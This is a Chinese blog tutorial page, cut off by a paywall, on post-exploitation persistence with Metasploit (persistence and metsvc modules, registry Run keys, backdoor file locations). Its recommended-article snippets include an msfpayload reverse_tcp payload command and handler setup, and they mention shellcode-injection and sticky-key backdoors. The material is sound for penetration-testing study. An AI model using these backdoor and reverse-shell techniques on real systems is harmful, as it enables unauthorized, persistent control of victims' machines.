后渗透后门_三大渗透测试框架权限维持技术

最新推荐文章于 2024-05-07 10:57:08 发布
最新推荐文章于 2024-05-07 10:57:08 发布
阅读量753 收藏 2
点赞数 1
文章标签: 后渗透后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36115475/article/details/112655612
版权

0x00 前言

在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。

那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?

0x01 MSF权限维持

使用MSF维持权限的前提是先获得一个meterpreter shell,通过meterpreter shell获取持久性shell的方法有两种:

Persistence模块

通过启动项启动(persistence)的方式,在目标机器上以反弹回连。

9184b8fd0321e0e1e0da96abcd0d9df3.png 
-U:设置后门在用户登录后自启动。该方式会在HKCUSoftwareMicrosoftWindowsCurrentVersionRun下添加注册表信息。推荐使用该参数;
-X:设置后门在系统启动后自启动。该方式会在HKLMSoftwareMicrosoftWindowsCurrentVersionRun下添加注册表信息。由于权限问题,会导致添加失败,后门将无法启动。
-S:作为服务自动启动代理程序(具有SYSTEM权限)

生成的相关文件位置 :

# 后门文件位置:
C:WindowsTemp
C:UsersAdministratorAppDataLocalTemp
# 注册表位置:
HKCUSoftwareMicrosoftWindowsCurrentVersionRun
HKLMSoftwareMicrosoftWindowsCurrentVersionRun

ef24feb43a505c511b49c9e54c9649a3.png

Metsvc 模块

通过服务(metsvc)启动的方式,在目标机器启动后自启动一个服务,等待连接。

最低0.47元/天 解锁文章
佘明
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit(后渗透攻击:操作系统后门
qq_41453632的博客
12-10 3646
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
渗透测试流程.zip
04-06
- **后门安装**:在系统中植入后门,以便在渗透测试结束后还能保持访问。 - **隐藏踪迹**:清理日志,隐藏渗透活动的痕迹。 7. **报告与修复建议** - **编写报告**:详细记录整个测试过程,包括发现的漏洞、利用...
三大渗透框架权限维持
09-28 1030
渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久...
2024年网络安全最新BlackMamba:C2后渗透框架_blackmamba c2(2),快点来白嫖
最新发布
2401_84264244的博客
05-07 583
打开BlackMamba目录,然后打开“keygen.py”文件。接下来,在网关或路由器打开端口65000和65005,具体端口号可选。点击一个人形和加号的按钮,输入待创建Python文件的路径,输入端口号和主机的IP地址,然后点击“创建”按钮。文件传输加密(上传/下载):可从客户端下载文件,或向客户端上传文件;通信加密:支持对除了屏幕视频流之外的所有通信信息进行加密;实时通信更新:支持客户端和服务器端之间的实时通信和更新;多客户端支持:支持同时连接多个客户端;客户端锁定:锁定和解锁客户端设备;
渗透测试框架
xiaoxiaodechongzi的博客
04-17 2426
渗透测试过程会面对大量渗透概念验证(proof of concept,POC和漏洞利用Exploit,EXP 常见的渗透测试框架 Metasploit,Pocsuite,Fsociety Pocsuite框架 一款基于漏洞和poc的远程漏洞验证框架 支持Linux/win/mac 知道创宇404实验室 也可以EXP 功能介绍 Pocsuite 3用Python3 编写,支持验证,利用及 壳 Pocsuite 3 也是一个SDK https://www.seebug.org/ 也有基于Pocsuite
渗透的常用姿势
小亮的博客
04-11 955
我的这篇《FreeSSHd 远程身份验证绕过漏洞利用》文章教大家如何利用一个服务的漏洞渗透一台服务器。 接下来谈谈渗透后的基本操作。 假设你已经获得了一个meterpreter连接。输入help就可以看到最基本的功能。英文很简单,我就不翻译了。 meterpreter > help Core Commands ============= Command ...
MSF之meterpreter权限维持
梦想专栏
07-30 2058
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
Metasploit是一款强大的渗透测试工具,其核心在于Exploit框架,可以有效地帮助网络安全专业人员发现、分析和利用系统漏洞。"pitchw9a"可能指的是一个特定的漏洞或exploit模块,它可能是Metasploit框架中的一个重要...
WEB代码审计与渗透测试.rar_web审计_代码审计_渗透
09-23
**WEB代码审计与渗透测试详解** 在网络安全领域,WEB代码审计和渗透测试是至关重要的环节,它们确保了网站和应用程序的安全性,防止恶意攻击和数据泄露。本资料集"WEB代码审计与渗透测试.rar"专注于这两方面的实践...
Metasploit渗透测试指南 修订版
09-21
《Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
网络安全-渗透完整笔记
03-27
总的来说,网络安全的渗透测试是一门综合性的技术,涵盖漏洞分析、代码审计、网络扫描、攻击执行、后门部署、免杀技术等多个方面。学习这些知识不仅能够帮助安全专家提高防御能力,也能使攻击者了解如何实施更有效的...
windows系统后渗透阶段权限维持方法小结
闵行小鱼塘
07-02 593
归纳下windows系统维持权限的方法
渗透之各种维持权限后门原理即利用
p_utao的博客
09-13 3489
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
渗透测试流程——Windows服务器
dongxie_tk的博客
09-05 1045
相应名词解释 端口(port)可以认为是计算机与外界通信交流的出口。其中硬件领域的端口又称为接口,如USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入/输出)缓冲区。 端口是传输层的内容,是面向连接的,它们对应着网络上常见的一些服务。这些常见的服务可划分为使用TCP端口(面向连接,如打电话)
渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)
W小哥
03-23 8083
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 一、环境搭建 靶机: Windwos Server 2008 系统 靶机IP地址: 192.168.226.137 攻击IP地址: 192.168.226.1 二、模拟攻击 2.1 扫描端口 拿到目标IP首先使用nmap扫描,探测一下开放的端口 nmap -sS 192.168.226.137 发现目标系统的 3389 号端口开发 2.2 暴力破解 Administrator 密码 使用 hydra 工具爆破 Adminis
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2151
metasploit后渗透测试--持久化后门
渗透介绍及运用
whoim_i的博客
11-05 7702
目录一、前言二、后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获取权限11.捕捉屏幕12.得到远程桌面13.权限提升14.清除事件日志15.网络摄像头16. 通过shell 来关闭防火墙三、利用ms17-010漏洞进行后渗透攻击1、添...
内网渗透综述
kracer的博客
12-01 8347
目录 一、什么是内网渗透 二、内网基础知识 三、内网渗透基本流程 一、什么是内网渗透 内网是一个只有组织工作人员才能访问的专用网络,简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统,通过信息收集找到网站漏洞可以顺利通过公网进入公司内部网络时,进一步对公司内部网络的渗透攻击即为内网渗透。 与外网渗透区别: 1、外网渗透更侧重于找漏洞寻找突破口,考验的是白帽的综合能力,外网渗透的最终还是为了进入内网。 ...
渗透之meterpreter使用攻略
钻石
01-06 8345
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
INTRODUÇÃO A PÓS EXPLORAÇÃO.pdf
10-06
此外,熟悉各种工具和技术,如Meterpreter、Empyre等后渗透框架,以及如何编写脚本来自动化某些任务,也是非常重要的。 同时,为了成为一名合格的安全专家,不仅要知道如何攻击,还要懂得如何防御。理解攻击者的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值